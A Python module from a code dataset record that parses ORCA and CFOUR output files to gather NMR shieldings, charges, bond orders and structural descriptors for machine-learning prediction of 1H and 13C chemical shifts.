Powers Of Two.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"32888069851","text":"import os\nimport argparse\nimport copy\nimport numpy as np\nimport statistics\nimport random\nfrom ase import neighborlist\nfrom ase.io import read\nfrom ase.data import covalent_radii\n\n# for exponential fitting (CBS extrapolation)\nfrom scipy.optimize import curve_fit\n\n\n### GLOBAL DECLARATIONS ###\n\n# use slightly modified covalent radii from ase for neighbor recognition\ncustom_radii = covalent_radii.copy()\ncustom_radii[3] -= 0.15 # reduce radius of Li\ncustom_radii[6] -= 0.05 # reduce radius of C\n\n# Covalent radii (taken from Pyykko and Atsumi, Chem. Eur. J. 15, 2009, 188-197).\n# Values for metals decreased by 10 %.\n# This was copied from gituhb project dftd3/tad-dftd3/src/tad_dftd3/data.py\ncovalent_rad_2009 = np.array([ \n 0.00, # None\n 0.32,0.46, # H,He\n 1.20,0.94,0.77,0.75,0.71,0.63,0.64,0.67, # Li-Ne\n 1.40,1.25,1.13,1.04,1.10,1.02,0.99,0.96, # Na-Ar\n 1.76,1.54, # K,Ca\n 1.33,1.22,1.21,1.10,1.07,1.04,1.00,0.99,1.01,1.09, # Sc-Zn\n 1.12,1.09,1.15,1.10,1.14,1.17, # Ga-Kr\n 1.89,1.67, # Rb,Sr\n 1.47,1.39,1.32,1.24,1.15,1.13,1.13,1.08,1.15,1.23, # Y-Cd\n 1.28,1.26,1.26,1.23,1.32,1.31, # In-Xe\n 2.09,1.76,1.62, # Cs-La\n 1.47,1.58,1.57,1.56,1.55,1.51,1.52, # Ce-Gd\n 1.51,1.50,1.49,1.49,1.48,1.53,1.46, # Tb-Lu\n 1.37,1.31,1.23,1.18,1.16,1.11,1.12,1.13,1.32, # Hf-Hg\n 1.30,1.30,1.36,1.31,1.38,1.42, # Tl-Rn\n 2.01,1.81,1.67, # Fr-Ac\n 1.58,1.52,1.53,1.54,1.55,1.49,1.49, # Th-Cm\n 1.51,1.51,1.48,1.50,1.56,1.58,1.45, # Bk-Lr\n 1.41,1.34,1.29,1.27,1.21,1.16,1.15,1.09,1.22, # Rf-Cn\n 1.36,1.43,1.46,1.58,1.48,1.57 # Nh-Og\n])\n\n# D3 covalent radii used to construct the coordianation number\ncovalent_rad_d3 = 4.0 / 3.0 * covalent_rad_2009\n\n# number of digits of compounds (dc, e.g. 042) and structures (ds, e.g. 
04)\ndc = 3\nds = 2\n\n# the following is used for ACSF and SOAP descriptors\nelements_sym = ('H', 'Li', 'B', 'C', 'N', 'O', 'F', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl')\ncutoff_sym = 5.0 # used for ACSF and SOAP, but may be varied\n\n### END GLOBAL DECLARATIONS ###\n\n\ndef all_equal(lst):\n \"\"\"Checks if all elements of the input list are equal.\"\"\"\n\n first = lst[0]\n equal = True\n for el in lst:\n if el != first:\n equal = False\n break\n\n return equal\n\n\ndef read_number(entry):\n \"\"\"For an arbitrary string entry containing one (int or float) number surrounded by chars, extract the number.\"\"\"\n\n start, end = None, None\n\n for i, c in enumerate(entry):\n if c.isdigit():\n start = i\n break\n if start is None:\n print(\"ERROR in read_number(): entry '{}' does not contain any digit!\".format(entry))\n exit()\n \n for i, c in enumerate(reversed(entry)):\n if c.isdigit():\n end = len(entry) - i\n break\n\n return entry[start:end]\n\n\ndef get_end(data, start):\n \"\"\"For a given read input file, get the line range until next blank line.\n \n data: complete list of lines that has been read from a file via .readlines()\n start: line number of the first line of the text block\n \"\"\"\n\n n_lines = 0\n while data[start+n_lines] != '\\n':\n n_lines += 1\n\n return start + n_lines\n\n\ndef read_cfour(outpath):\n \"\"\"Read the coupled cluster output from CFOUR calculations.\"\"\"\n\n with open(outpath, 'r') as inp:\n data = inp.readlines()\n\n # get the range in which the shieldings are listed\n start = data.index(' CCSD(T) Nuclear Magnetic Resonance Shieldings and Anisotropies\\n') + 5\n end = data.index(' HF-SCF Nuclear Magnetic Resonance Shieldings and Anisotropies\\n') - 3\n \n shieldings = []\n for line in data[start:end]:\n tmp = line.split()\n shieldings.append({\n 'nuc': int(tmp[0]),\n 'elem': tmp[1].upper(),\n 'val': float(tmp[2])\n })\n\n # make sure the shieldings are ordered according to the atom numbering (store as tuple)\n return tuple(sorted(shieldings, key=lambda s: s['nuc']))\n\n\n# get number of calculated NMR nuclei\n# outlist is a list of lines read from a calculation output file\ndef get_number_nmr(outlist):\n \n n_nmr = None\n for line in outlist[outlist.index(' * ORCA property calculations *\\n'):]:\n if 'Number of nuclei for epr/nmr' in line: n_nmr = int(line.split()[-1])\n if n_nmr is None:\n print(\"ERROR: Number of calculated NMR nuclei was not found in ORCA output!\")\n exit()\n\n return n_nmr\n\n\ndef read_orca(outpath):\n \"\"\"Read the DFT output from ORCA calculations.\"\"\"\n\n with open(outpath, 'r') as inp:\n data = inp.readlines()\n\n # get number of calculated NMR nuclei\n n_nmr = get_number_nmr(data)\n\n # get the range in which the shieldings are listed\n start = data.index('CHEMICAL SHIELDING SUMMARY (ppm)\\n') + 6\n end = start + n_nmr\n\n shieldings = []\n for line in data[start:end]:\n tmp = line.split()\n shieldings.append({\n 'nuc': int(tmp[0]) + 1, # ORCA starts at 0 counting the nuc numbers\n 'elem': tmp[1].upper(),\n 'val': float(tmp[2])\n })\n\n # make sure the shieldings are ordered according to the atom numbering (store as tuple)\n return tuple(sorted(shieldings, key=lambda s: s['nuc']))\n\n\n# Get the reference shieldings from the coupled cluster output (CFOUR)\n# ATTENTION: all Hs and all Cs are averaged, works e.g. 
for TMS and CH4\ndef getref_cfour(path, ref, basis):\n \n with open(os.path.join(path, ref, \"ccsd_t\", basis, \"cfour.out\"), 'r') as inp:\n data = inp.readlines()\n\n # get the range in which the shieldings are listed\n start = data.index(' CCSD(T) Nuclear Magnetic Resonance Shieldings and Anisotropies\\n') + 5\n end = data.index(' HF-SCF Nuclear Magnetic Resonance Shieldings and Anisotropies\\n') - 3\n \n val_h = 0.0\n val_c = 0.0\n cnt_h = 0\n cnt_c = 0\n\n for line in data[start:end]:\n tmp = line.split()\n if tmp[1].upper() == 'H':\n val_h += float(tmp[2])\n cnt_h += 1\n if tmp[1].upper() == 'C':\n val_c += float(tmp[2])\n cnt_c += 1\n\n val_h = val_h / cnt_h\n val_c = val_c / cnt_c\n\n return {'H': val_h, 'C': val_c}\n\n\n# Get the reference shieldings from the DFT output (ORCA)\n# ATTENTION: all Hs and all Cs are averaged, works e.g. for TMS and CH4\ndef getref_orca(path):\n\n with open(os.path.join(path, \"orca.out\"), 'r') as inp:\n data = inp.readlines()\n\n # get number of calculated NMR nuclei\n n_nmr = get_number_nmr(data)\n\n # get the range in which the shieldings are listed\n start = data.index('CHEMICAL SHIELDING SUMMARY (ppm)\\n') + 6\n end = start + n_nmr\n \n val_h = 0.0\n val_c = 0.0\n cnt_h = 0\n cnt_c = 0\n\n for line in data[start:end]:\n tmp = line.split()\n if tmp[1].upper() == 'H':\n val_h += float(tmp[2])\n cnt_h += 1\n if tmp[1].upper() == 'C':\n val_c += float(tmp[2])\n cnt_c += 1\n\n val_h = val_h / cnt_h\n val_c = val_c / cnt_c\n\n return {'H': val_h, 'C': val_c}\n\n\ndef inv_cubic(x, a, b):\n return a / x**3 + b\n\n\ndef extrapolate(cc_3z, dft_3z, dft_4z, dft_5z):\n\n cardinal = np.array([4, 5, 6])\n shielding = np.array([dft_3z, dft_4z, dft_5z])\n\n xdata = cardinal\n ydata = shielding\n\n params_cub, _ = curve_fit(inv_cubic, xdata, ydata, p0=[10,100]) # params_cub = [a b]\n dft_cbs = params_cub[1]\n\n return cc_3z + (dft_cbs - dft_3z)\n\n\n# read the molecule and return mol (ase.Atoms object) and dict neighbors\ndef read_mol(structpath):\n\n # read the .xyz coordinates from the molecular structures\n mol = read(os.path.join(structpath), format='xyz')\n\n # use covalent radii as thresholds for neighbor determination (what about vdW radii?)\n cutoffs = [custom_radii[atom.number] for atom in mol]\n\n # build neighbor list and write list of neighboring atoms to the dict neighbors\n nl = neighborlist.build_neighbor_list(mol, cutoffs, self_interaction=False, bothways=True)\n neighbors = {}\n\n for i in range(len(mol)):\n indices = nl.get_neighbors(i)[0] # nl.get_neighbors(i) returns [0]: indices and [1]: offsets\n neighbors[i+1] = indices+1 # add 1 to key and to value to start counting of atoms at 1\n\n # exit if an H atom has not exactly 1 neighbor\n if mol.get_atomic_numbers()[i] == 1 and len(neighbors[i+1]) != 1:\n print(\"ERROR: H atom {} has not exactly one neighbor! 
File in: {}\".format(i+1, structpath))\n exit()\n\n return mol, neighbors\n\n\n# get the coordination number (CN) as number of neighbors (input is neighbors from read_mol)\n# read_mol() ensures that every H atom has exactly one neighbor\ndef get_cn(neighbors):\n cn = {}\n for key, value in neighbors.items():\n cn[key] = len(value)\n\n return cn\n\n\n# get the coordination number (CN) like it is done in the D3 dispersion correction model:\n# CN(A) = sum_B!=A^Nat ( 1 / (1 + exp(-k1 (k2*R_AB^cov/R_AB - 1))) )\n# with A, B: atom indices, Nat: number of atoms in molecule,\n# R_AB: distance of A and B according to input structure\n# k2*R_AB^cov = k2*(R_A^cov + R_B^cov): element-specific covalent atom radii from Pyykkö and Atsumi scaled with k2 = 4/3\n# k1 = 16: scaling factor; both k1 and k2 are set in the D3 model (J. Chem. Phys. 132, 154104); covalent_rad_d3 already include k2 (see above)\ndef get_cn_d3(mol):\n an = mol.get_atomic_numbers() # get the atomic numbers as list\n distances = mol.get_all_distances() # get all the atom distances as 2D list\n cn = {i+1: 0.0 for i in range(len(an))} # fill a dict with 0.0 for all atom indices\n\n # loop over all atom pairs\n for a in range(len(an)):\n for b in range(a+1, len(an)):\n r_ab = distances[a][b]\n rcov_ab = covalent_rad_d3[an[a]] + covalent_rad_d3[an[b]]\n term = 1.0 / (1.0 + np.exp(-16.0 * (rcov_ab/r_ab - 1.0)))\n # add the term of the sum to the CN entry of both a and b (in dict: atom indices, no 0)\n cn[a+1] += term\n cn[b+1] += term\n\n return cn\n\n\n# in the eyes of a certain atom, get the number of bonded X atoms (X = H, C, N, O, S, Cl)\n# retruns a dict with all atoms [no_H, no_C, no_N, no_O, no_S, no_Cl]\n# if only_for is not empty, then get no_atoms only for chosen nuclei (e.g. [1, 6] for only H and C)\ndef get_no_bond_atoms(mol, neighbors, only_for=[]):\n no_atoms = {}\n elements = [1, 6, 7, 8, 16, 17] # H, C, N, O, S, Cl\n\n for key, value in neighbors.items():\n # if only_for is not empty, make sure the atomic number of key fits entries in only_for\n if len(only_for) == 0 or mol.get_atomic_numbers()[key-1] in only_for:\n n = [0, 0, 0, 0, 0, 0] # number of H, C, N, O, S, Cl\n for neigh in value:\n anx = mol.get_atomic_numbers()[neigh-1]\n for i, elem in enumerate(elements):\n if anx == elem:\n n[i] += 1\n no_atoms[key] = n\n \n return no_atoms\n\n\n# in the eyes of a certain atom, get the number of secondarily bonded X atoms (X = H, C, N, O, S, Cl)\n# retruns a dict with all atoms [no_H, no_C, no_N, no_O, no_S, no_Cl]\n# if only_for is not empty, then get no_atoms only for chosen nuclei (e.g. 
[1, 6] for only H and C)\ndef get_no_sec_atoms(mol, neighbors, only_for=[]):\n no_atoms = {}\n elements = [1, 6, 7, 8, 16, 17] # H, C, N, O, S, Cl\n cn = get_cn(neighbors) # in this context, coordination number means number of directly bonded atoms\n prim_bonded = get_no_bond_atoms(mol, neighbors)\n\n for key, value in neighbors.items():\n # if only_for is not empty, make sure the atomic number of key fits entries in only_for\n if len(only_for) == 0 or mol.get_atomic_numbers()[key-1] in only_for:\n n = [0, 0, 0, 0, 0, 0] # number of H, C, N, O, S, Cl\n\n # for all neighbors of key, add all entries of prim_bonded to n\n for neigh in value:\n for i in range(len(elements)):\n n[i] += prim_bonded.get(neigh)[i]\n\n # now, atom key has falsely been counted cn(key) times (if it occurs in elements)\n this_an = mol.get_atomic_numbers()[key-1] # the atomic number of atom key\n this_cn = cn.get(key) # the CN of atom key is 1 for H atoms\n # subtract respective entries in n\n if this_an in elements:\n n[elements.index(this_an)] -= this_cn\n\n no_atoms[key] = n\n \n return no_atoms\n\n\ndef get_atomic_charges(mol, outputpath, mode):\n \"\"\"Get atomic charges from ORCA output.\n\n everything is stored in dicts {index: charge}\n mode: can be 'mulliken' or 'loewdin'\n \"\"\"\n\n nat = len(mol)\n charges = {}\n\n if mode == 'mulliken':\n pattern = 'MULLIKEN ATOMIC CHARGES\\n'\n offset = 2\n elif mode == 'loewdin':\n pattern = 'LOEWDIN ATOMIC CHARGES\\n'\n offset = 2\n else:\n print(\"ERROR: unknown mode in get_atomic_charges!\")\n exit()\n\n with open(outputpath, 'r') as inp:\n data = inp.readlines()\n \n # get the range in which the Mulliken charges are listed\n start = data.index(pattern) + offset\n end = start + nat\n\n # first entry in line is index starting at 0, last is the value\n for line in data[start:end]:\n tmp = line.split()\n charges[int(tmp[0])+1] = float(tmp[-1])\n\n return charges\n\n\ndef get_orbital_charges(outputpath, mode):\n \"\"\"Get orbital charges form ORCA output.\n\n for H: s-/p-orbital charges; for C also d-orbital charges\n also get the standard deviation of the 3 p orbital charges (px/py/pz) as mean of uniform charge distribution\n everything is stored in dicts {index: charge}\n mode: can be 'mulliken' or 'loewdin'\n \"\"\"\n\n s_charges = {}\n p_charges = {}\n d_charges = {}\n px_charges = {}\n py_charges = {}\n pz_charges = {}\n p_stdev = {}\n\n if mode == 'mulliken':\n pattern = 'MULLIKEN REDUCED ORBITAL CHARGES\\n'\n offset = 2\n elif mode == 'loewdin':\n pattern = 'LOEWDIN REDUCED ORBITAL CHARGES\\n'\n offset = 2\n else:\n print(\"ERROR: unknown mode in get_orbital_charges!\")\n exit()\n\n with open(outputpath, 'r') as inp:\n data = inp.readlines()\n \n # get the range in which the orbital charges of the given pattern are listed\n start = data.index(pattern) + offset\n end = get_end(data, start)\n\n # go through the lines and store the sums of s/p/d orbital entries (last column each) in the dicts\n for index, line in enumerate(data[start:end]):\n tmp = line.split()\n\n if tmp[0].isdigit():\n # atom number and next lines\n atnum = int(tmp[0]) + 1\n tmp_next1 = data[start+index+1].split()\n tmp_next2 = data[start+index+2].split()\n tmp_next3 = data[start+index+3].split()\n # s- and p-orbital charges\n s_charges[atnum] = float(tmp[-1])\n p_charges[atnum] = float(tmp_next1[5])\n pz_charges[atnum] = float(tmp_next1[2])\n px_charges[atnum] = float(tmp_next2[2])\n py_charges[atnum] = float(tmp_next3[2])\n\n # d-orbital charge (only for carbon)\n if tmp[1] == 'C':\n tmp_next4 = 
data[start+index+4].split()\n d_charges[atnum] = float(tmp_next4[5])\n\n for at in p_charges.keys():\n p_stdev[at] = statistics.stdev([px_charges[at], py_charges[at], pz_charges[at]])\n #p_stdev[at] = np.std([px_charges[at], py_charges[at], pz_charges[at]], ddof=1)\n\n return s_charges, p_charges, d_charges, p_stdev\n\n\ndef get_Mayer_pop(mol, outputpath):\n \"\"\"Get the Mayer population analysis.\n \n VA: total valence\n BVA: bonded valence\n FA: free valence\n \"\"\"\n\n nat = len(mol)\n va = {}\n bva = {}\n fa = {}\n\n with open(outputpath, 'r') as inp:\n data = inp.readlines()\n \n # get the range in which the Mayer valence values are listed\n start = data.index(' * MAYER POPULATION ANALYSIS *\\n') + 11\n end = start + nat\n\n # first column is atom index, 6-8 in line is index of the valence quantities\n for line in data[start:end]:\n tmp = line.split()\n va[int(tmp[0])+1] = float(tmp[5])\n bva[int(tmp[0])+1] = float(tmp[6])\n fa[int(tmp[0])+1] = float(tmp[7])\n\n return va, bva, fa\n\n\ndef get_bond_orders(neighbors, outputpath, mode):\n \"\"\"get bond orders for of Loewdin and Mayer type.\n \n \n reads bond orders and calculates the sum and average for each atom\n returns list of dicts\n mode: can be 'loewdin' or 'mayer'\n \"\"\"\n\n bond_orders = []\n bond_orders_sum = {}\n bond_orders_av = {}\n if mode == 'loewdin':\n pattern = 'LOEWDIN BOND ORDERS (THRESH 0.050000)\\n'\n offset = 2\n thresh_bo = 0.05\n elif mode == 'mayer':\n pattern = ' Mayer bond orders larger than 0.100000\\n'\n offset = 1\n thresh_bo = 0.1\n else:\n print(\"ERROR: unknown mode in get_bond_orders!\")\n exit()\n\n with open(outputpath, 'r') as inp:\n data = inp.readlines()\n \n # get the range in which the bond orders of the given pattern are listed\n start = data.index(pattern) + offset\n end = get_end(data, start)\n\n # read all bond orders and store in list of dicts (up to 3 entries per line)\n for line in data[start:end]:\n # remove all unnecessary characters from the list because they can unite with the element symbol if it has 2 letters\n # e.g. 
['0-C', ','] but ['11-Li,'] (same for ')', same for 3-digit atoms numbers); without those, all entries should contain 3 elements\n #tmp = list(filter(lambda c: c not in [',', 'B(', ')', ':'], line.split())) # old way to deal with the problem\n tmp = line.replace(',', ' ').replace('B(', ' ').replace(')', ' ').replace(':', ' ').split()\n for i in range(int(len(tmp)/3)):\n bond_orders.append({\n 'atom_A': int(read_number(tmp[i*3]))+1,\n 'atom_B': int(read_number(tmp[i*3+1]))+1,\n 'bond_order': float(tmp[i*3+2])\n })\n\n # use atoms (key) and neighbors (value) to look for all bonds for each atom and collect the respective bond orders\n for key, value in neighbors.items():\n these_bos = []\n for bo in bond_orders:\n if (bo['atom_A'] == key and bo['atom_B'] in value) or (bo['atom_B'] == key and bo['atom_A'] in value):\n these_bos.append(bo['bond_order'])\n \n # in case bond order of known neighbors are below the threshold, they are missing; add respective entries with value 1/2 * threshold\n bo_missing = len(value) - len(these_bos)\n if bo_missing != 0: these_bos.extend([thresh_bo/2 for i in range(bo_missing)])\n \n # calculate sum and average of the collected bond orders\n bond_orders_sum[key] = sum(these_bos)\n bond_orders_av[key] = sum(these_bos)/len(these_bos) # this breaks if an atoms has no neighbors\n \n return bond_orders_sum, bond_orders_av\n\n\n# in addition to the total isotropic shielding constant (read by read_orca), get the following additional NMR quantities:\n# diamagnetic shielding constant, paramagnetic shielding constant, span, skew, asymmetry, anisotropy\ndef get_nmr_quantities(outputpath):\n\n with open(outputpath, 'r') as inp:\n data = inp.readlines()\n\n # get number of calculated NMR nuclei\n n_nmr = get_number_nmr(data)\n\n # get start of the chemical shift block\n start = data.index('CHEMICAL SHIFTS\\n') + 6\n\n # data is arranged in blocks of 27 lines for every nucleus\n # line 21/22 contain dia-/paramagnetic shielding contants, 24 the total shielding with its components\n quantities = []\n for at in range(n_nmr):\n \n atnum = \"\"\n for c in data[start+at*27].split()[1]:\n if c.isdigit(): atnum += c\n atnum = int(atnum) + 1\n tmp = data[start+at*27+24].split()\n quantities.append({\n 'at_index': atnum,\n 'shielding_dia': data[start+at*27+21].split()[5],\n 'shielding_para': data[start+at*27+22].split()[5],\n 'sigma_components': [float(tmp[i+1]) for i in range(3)]\n })\n\n # calculate the quantities for all atoms\n for quant in quantities:\n \n # from shielding tensor sigma get min, mid and max value of the diagonal sigma_ii elements and sigma_iso\n sigma = quant['sigma_components'].copy()\n sigma_iso = sum(sigma)/len(sigma)\n sigma_min = min(sigma)\n sigma.remove(sigma_min)\n sigma_mid = min(sigma)\n sigma_max = max(sigma)\n\n # get span: Omega = sigma_max - sigma_min (>= 0)\n span = sigma_max - sigma_min\n\n # escape somehow if span == 0.0 (all other quantities are 0.0, too)\n if span < 0.0001:\n skew = 0.0\n asymmetry = 0.0\n anisotropy = 0.0\n else:\n # get skew: kappa = 3*(sigma_iso - sigma_mid)/Omega (-1 <= kappa <= 1)\n skew = 3*(sigma_iso - sigma_mid)/span\n\n # get asymmetry: eta = (sigma_mid - sigma_min)/(sigma_max - sigma_iso)\n asymmetry = (sigma_mid - sigma_min)/(sigma_max - sigma_iso)\n\n # get anisotropy: Delta = sigma_max - (sigma_min + sigma_mid)/2\n anisotropy = sigma_max - (sigma_min + sigma_mid)/2\n\n quant['span'] = span\n quant['skew'] = skew\n quant['asymmetry'] = asymmetry\n quant['anisotropy'] = anisotropy\n\n return tuple(sorted(quantities, 
key=lambda q: q['at_index']))\n\n\ndef get_reference(path_data, ref, func, basis, high=None):\n\n has_highlevel = False\n if high is not None: has_highlevel = True\n\n # get the reference shielding values (e.g. from TMS molecule)\n refshieldings = getref_orca(os.path.join(path_data, ref, func, basis))\n print(\"using low-level DFT 1H reference shielding ({}): {} ppm\".format(ref, refshieldings['H']))\n print(\"using low-level DFT 13C reference shielding ({}): {} ppm\\n\".format(ref, refshieldings['C']))\n\n refshieldings_high = {'H': None, 'C': None}\n if has_highlevel:\n # get high-level shieldings of reference compound if provided\n refshieldings_high_cc = getref_cfour(path_data, ref, high['basis_3z'])\n refshieldings_high_dft_cc = getref_orca(os.path.join(path_data, ref, high['functional'], high['basis_3z']))\n refshieldings_high_dft_x = getref_orca(os.path.join(path_data, ref, high['functional'], high['basis_4z']))\n refshieldings_high_dft_y = getref_orca(os.path.join(path_data, ref, high['functional'], high['basis_5z']))\n refshieldings_high_cc_cbs = {\n 'H': extrapolate(refshieldings_high_cc['H'], refshieldings_high_dft_cc['H'], refshieldings_high_dft_x['H'], refshieldings_high_dft_y['H']),\n 'C': extrapolate(refshieldings_high_cc['C'], refshieldings_high_dft_cc['C'], refshieldings_high_dft_x['C'], refshieldings_high_dft_y['C'])\n }\n\n print(\"using high-level CCSD(T)/TZ+ 1H reference shielding ({}): {} ppm\".format(ref, refshieldings_high_cc_cbs['H']))\n print(\"using high-level CCSD(T)/TZ+ 13C reference shielding ({}): {} ppm\\n\".format(ref, refshieldings_high_cc_cbs['C']))\n\n refshieldings_high = {'H': refshieldings_high_cc_cbs['H'], 'C': refshieldings_high_cc_cbs['C']}\n\n return refshieldings, refshieldings_high\n\n\n# Read all data from a molecule and process it to get the shieldings and shifts of all atoms\n# Save all information in two lists of dicts (data_h, data_c) and return further data to extend the ML input with\ndef get_data(path_xyz, path_out, name, ref_shield, include, high=None, ref_shield_high={'H': None, 'C': None}, path_data=None, print_names=False):\n\n has_highlevel = False\n if high is not None: has_highlevel = True\n\n data_h = []\n data_c = []\n\n # read the molecular data from the .xyz file and get the number of atoms and list of element symbols\n mol, neighbors = read_mol(path_xyz)\n nat = len(mol)\n\n # get shieldings of the sample compound from ORCA output\n shieldings = read_orca(path_out)\n nmr_nuc = [s['nuc'] for s in shieldings]\n\n if has_highlevel:\n # get high-level shieldings if provided\n shieldings_high_cc_full = read_cfour(os.path.join(path_data, 'ccsd_t', high['basis_3z'], 'cfour.out'))\n shieldings_high_dft_cc = read_orca(os.path.join(path_data, high['functional'], high['basis_3z'], 'orca.out'))\n shieldings_high_dft_x = read_orca(os.path.join(path_data, high['functional'], high['basis_4z'], 'orca.out'))\n shieldings_high_dft_y = read_orca(os.path.join(path_data, high['functional'], high['basis_5z'], 'orca.out'))\n # reduce the list to only the relevant NMR nuclei (only necessary for shielding from read_cfour)\n shieldings_high_cc = tuple([s for s in shieldings_high_cc_full if s['nuc'] in nmr_nuc])\n \n # get some data needed as descriptors\n bond_atoms = get_no_bond_atoms(mol, neighbors)\n sec_atoms = get_no_sec_atoms(mol, neighbors)\n cn_d3 = get_cn_d3(mol)\n distances = mol.get_all_distances()\n\n # get a buch of ML descriptors from the orca output (mainly based on density matrix and NMR properties)\n at_chrg_mulliken = 
get_atomic_charges(mol, path_out, 'mulliken')\n at_chrg_loewdin = get_atomic_charges(mol, path_out, 'loewdin')\n orb_chrg_mulliken_s, orb_chrg_mulliken_p, orb_chrg_mulliken_d, orb_stdev_mulliken_p = get_orbital_charges(path_out, 'mulliken')\n orb_chrg_loewdin_s, orb_chrg_loewdin_p, orb_chrg_loewdin_d, orb_stdev_loewdin_p = get_orbital_charges(path_out, 'loewdin')\n mayer_VA, _, _ = get_Mayer_pop(mol, path_out)\n bond_orders_loewdin_sum, bond_orders_loewdin_av = get_bond_orders(neighbors, path_out, 'loewdin')\n bond_orders_mayer_sum, bond_orders_mayer_av = get_bond_orders(neighbors, path_out, 'mayer')\n nmr_quantities = get_nmr_quantities(path_out)\n\n # get the symmetric fingerprint descriptors\n if 'acsf' in include:\n acsf_mol = descriptors.acsf.create(mol)\n if 'soap' in include:\n soap_mol = descriptors.soap.create(mol)\n soap_mol = np.delete(soap_mol, descriptors.soap_zero_indexlist, 1)\n\n # loop over all atoms in the compound\n for iat in range(len(nmr_nuc)):\n\n high_cc_3z = high_dft_3z = high_dft_4z = high_dft_5z = None\n\n if has_highlevel:\n # ensure 'nuc' and 'elem' is the same for all the data (shieldings_high_cc, _dft_cc, _dft_x, _dft_y and the low level sample)\n nucs = [shieldings_high_cc[iat]['nuc'], shieldings_high_dft_cc[iat]['nuc'], shieldings_high_dft_x[iat]['nuc'], shieldings_high_dft_y[iat]['nuc'], shieldings[iat]['nuc']]\n elems = [shieldings_high_cc[iat]['elem'], shieldings_high_dft_cc[iat]['elem'], shieldings_high_dft_x[iat]['elem'], shieldings_high_dft_y[iat]['elem'], shieldings[iat]['elem']]\n if not all_equal(nucs):\n print(\"ERROR with sample compound {}: nuclei order in CFOUR and ORCA outputs is not the same!\".format(name))\n exit()\n if not all_equal(elems):\n print(\"ERROR with sample compound {}: element order in CFOUR and ORCA outputs is not the same!\".format(name))\n exit()\n \n high_cc_3z = shieldings_high_cc[iat]['val']\n high_dft_3z = shieldings_high_dft_cc[iat]['val']\n high_dft_4z = shieldings_high_dft_x[iat]['val']\n high_dft_5z = shieldings_high_dft_y[iat]['val']\n\n # if the actual atom is a H atom, get the distance to the neighboring C atom and its computed chemical shift\n if shieldings[iat]['elem'] == 'H':\n # get the atom number of the neighbor (at starts from 0, but neighbors from 1; -1 to adjust neigh to at scale)\n neigh = neighbors[nmr_nuc[iat]][0] # there is only one neighbor because this is a H atom\n # skip the whole data point if the H atom is bound to something else than C (atomic number 6) (this can be extended later)\n if not mol.get_atomic_numbers()[neigh-1] == 6: continue\n # get the distance between the actual atom and its neigbor (distances list starts from 0)\n dist = distances[nmr_nuc[iat]-1][neigh-1]\n # get the shift of the neighoring C atom\n neighshift = ref_shield['C'] - next((s for s in shieldings if s['nuc'] == neigh), None)['val']\n\n # add all ACSF and SOAP descriptors\n # acsf_mol and soap_mol need the atom index, but start with 0 so nmr_nuc-1\n if 'acsf' in include:\n acsf_data = {acsf_name: acsf_mol[nmr_nuc[iat]-1][i] for i, acsf_name in enumerate(descriptors.acsf_labels)}\n if 'soap' in include:\n soap_data = {soap_name: soap_mol[nmr_nuc[iat]-1][i] for i, soap_name in enumerate(descriptors.soap_labels_reduced)}\n\n if shieldings[iat]['elem'] == 'H':\n\n datapoint = DataPointH(name, nmr_nuc[iat], print_names)\n datapoint.set_attr_general(\n shieldings[iat]['val'],\n at_chrg_mulliken[nmr_nuc[iat]],\n at_chrg_loewdin[nmr_nuc[iat]],\n orb_chrg_mulliken_s[nmr_nuc[iat]],\n orb_chrg_loewdin_s[nmr_nuc[iat]],\n 
orb_chrg_mulliken_p[nmr_nuc[iat]],\n orb_chrg_loewdin_p[nmr_nuc[iat]],\n mayer_VA[nmr_nuc[iat]],\n nmr_quantities[iat]['shielding_dia'],\n nmr_quantities[iat]['shielding_para'],\n nmr_quantities[iat]['span'],\n nmr_quantities[iat]['skew'],\n nmr_quantities[iat]['asymmetry'],\n nmr_quantities[iat]['anisotropy'],\n high_cc_3z,\n high_dft_3z,\n high_dft_4z,\n high_dft_5z\n )\n if 'acsf' in include: datapoint.set_acsf(acsf_data)\n if 'soap' in include: datapoint.set_soap(soap_data)\n datapoint.set_attr_special(\n ref_shield['H'],\n neighshift,\n cn_d3[neigh], # the D3 CN of the neighboring C atom\n bond_atoms[neigh][0], # number of H bonded to neighboring C\n [sec_atoms[nmr_nuc[iat]][i] for i in range(4)], # number of secondarily bonded [H, C, N, O] (first 4 elements of sec_atoms)\n dist,\n bond_orders_loewdin_sum[nmr_nuc[iat]], # starts counting with 1\n bond_orders_mayer_sum[nmr_nuc[iat]], # starts counting with 1\n ref_shield_high['H']\n )\n\n data_h.append(datapoint)\n\n\n if shieldings[iat]['elem'] == 'C':\n\n datapoint = DataPointC(name, nmr_nuc[iat], print_names)\n datapoint.set_attr_general(\n shieldings[iat]['val'],\n at_chrg_mulliken[nmr_nuc[iat]],\n at_chrg_loewdin[nmr_nuc[iat]],\n orb_chrg_mulliken_s[nmr_nuc[iat]],\n orb_chrg_loewdin_s[nmr_nuc[iat]],\n orb_chrg_mulliken_p[nmr_nuc[iat]],\n orb_chrg_loewdin_p[nmr_nuc[iat]],\n mayer_VA[nmr_nuc[iat]],\n nmr_quantities[iat]['shielding_dia'],\n nmr_quantities[iat]['shielding_para'],\n nmr_quantities[iat]['span'],\n nmr_quantities[iat]['skew'],\n nmr_quantities[iat]['asymmetry'],\n nmr_quantities[iat]['anisotropy'],\n high_cc_3z,\n high_dft_3z,\n high_dft_4z,\n high_dft_5z\n )\n if 'acsf' in include: datapoint.set_acsf(acsf_data)\n if 'soap' in include: datapoint.set_soap(soap_data)\n datapoint.set_attr_special(\n ref_shield['C'],\n cn_d3[nmr_nuc[iat]], # the D3 CN of the C atom\n [bond_atoms[nmr_nuc[iat]][i] for i in range(4)], # number of bonded [H, C, N, O] (first 4 elements of bond_atoms)\n [sec_atoms[nmr_nuc[iat]][i] for i in range(4)], # number of secondarily bonded [H, C, N, O] (first 4 elements of sec_atoms)\n orb_chrg_mulliken_d[nmr_nuc[iat]], # starts counting with 1\n orb_chrg_loewdin_d[nmr_nuc[iat]], # starts counting with 1\n orb_stdev_mulliken_p[nmr_nuc[iat]], # starts counting with 1\n orb_stdev_loewdin_p[nmr_nuc[iat]], # starts counting with 1\n bond_orders_loewdin_sum[nmr_nuc[iat]], # starts counting with 1\n bond_orders_mayer_sum[nmr_nuc[iat]], # starts counting with 1\n bond_orders_loewdin_av[nmr_nuc[iat]], # starts counting with 1\n bond_orders_mayer_av[nmr_nuc[iat]], # starts counting with 1\n ref_shield_high['C']\n )\n\n 